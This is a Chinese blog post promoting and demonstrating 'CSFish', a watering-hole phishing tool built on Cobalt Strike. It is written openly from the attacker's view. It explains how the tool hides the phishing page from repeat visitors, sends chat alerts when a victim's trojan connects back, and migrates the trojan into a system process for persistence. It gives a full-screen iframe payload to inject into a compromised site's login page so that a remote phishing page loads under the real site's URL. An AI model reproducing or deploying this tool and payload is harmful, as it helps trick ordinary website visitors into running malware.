黑客新手必看：CSFish 实操教程，从入门到精通，掌控水坑钓鱼核心

最新推荐文章于 2025-04-27 15:01:52 发布

黑客-小千

最新推荐文章于 2025-04-27 15:01:52 发布

阅读量647

点赞数 13

文章标签： web安全网络

本文链接：https://blog.csdn.net/Cairo_A/article/details/147162460

版权

01 前言

水坑攻击属于APT攻击的一种，与其他社会工程手段(例如网络钓鱼)相比，水坑攻击的危险性来源于其利用的是不会被列入黑名单的合法网站。黑客无需耗费精力制作钓鱼网站，而是利用合法网站的弱点，隐蔽性比较强，更难被发现。访问者出于对这些网站的一贯信任，更容易放松警惕，继而落入水坑陷阱之中。

最近自己也在研究水坑钓鱼这块的内容，发现从攻击者视角来看，水坑钓鱼存在几个关键技术点，第一就是钓鱼收杆，为什么呢，因为访问者踩了水坑，如果还一直触发钓鱼页面，肯定容易被察觉，从而可能导致权限丢失，所以需要在用户踩了水坑上线后，需要进行钓鱼收杆，其次是CS上线提醒和权限维持，可以在第一时间知道目标上线并做好简单的权限维持和后续工作，保障权限的稳定性，于是基于以上理念，开发了CSFish这款水坑钓鱼工具。

02 工具介绍

CSFish可以实现自动收杆+上线通知+权限维持，比如当在目标网站埋下水坑后，A用户访问此业务网站触发水坑，访问了钓鱼网站，下载木马并执行上线后，CS会第一时间发送上线通知到飞书或者钉钉，同时会自动进行进程迁移到系统进程，以达到木马隐蔽，权限维持目的，且当A用户再次访问此业务网站时，则不会再触发访问到钓鱼网站，但是B用户仍然可以触发访问到钓鱼网站，这样水坑钓鱼攻击则不易被识破，从而钓到更多的鱼。

CSFish功能实现的思维导图如下：

备注：说明一下，为什么我会在此项目加入比较内网IP的原因，因为如果是已经突破进入了内网环境的情况下，要进行内网横向，假设如果拿下了一个内网的PHP环境的业务网站服务器，那么可以把这套项目迁移到这个内网服务器的web目录下部署水坑，此时如果不比较内网IP地址，则无法收杆，因为此时fish.php获取到的访问IP一定是一个内网IP。

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程，需要的小伙伴可以扫描下方二维码或链接免费领取~

03 工具演示

1、假设此处我通过漏洞或者getshell获得了修改前端文件的权限，我在登录页面
login.html中嵌入一个iframe标签，使远程服务器的html（此处我的钓鱼文件是部署在云服务器的）能远程加载到业务网站的登录页面。

<iframe src="http://xxxx/index.html" style="position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;"></iframe>

2、当用户访问业务网站登录页面时，则会访问到钓鱼页面，此处钓鱼页面用的是flash模版，效果如下，点击立即升级(注意：此处使用iframe是让远程服务器的页面加载到业务网站的页面，所以上方地址栏不会显示为你加载的钓鱼页面网址，而是业务网站自身网址，这样会增强访问者的信任)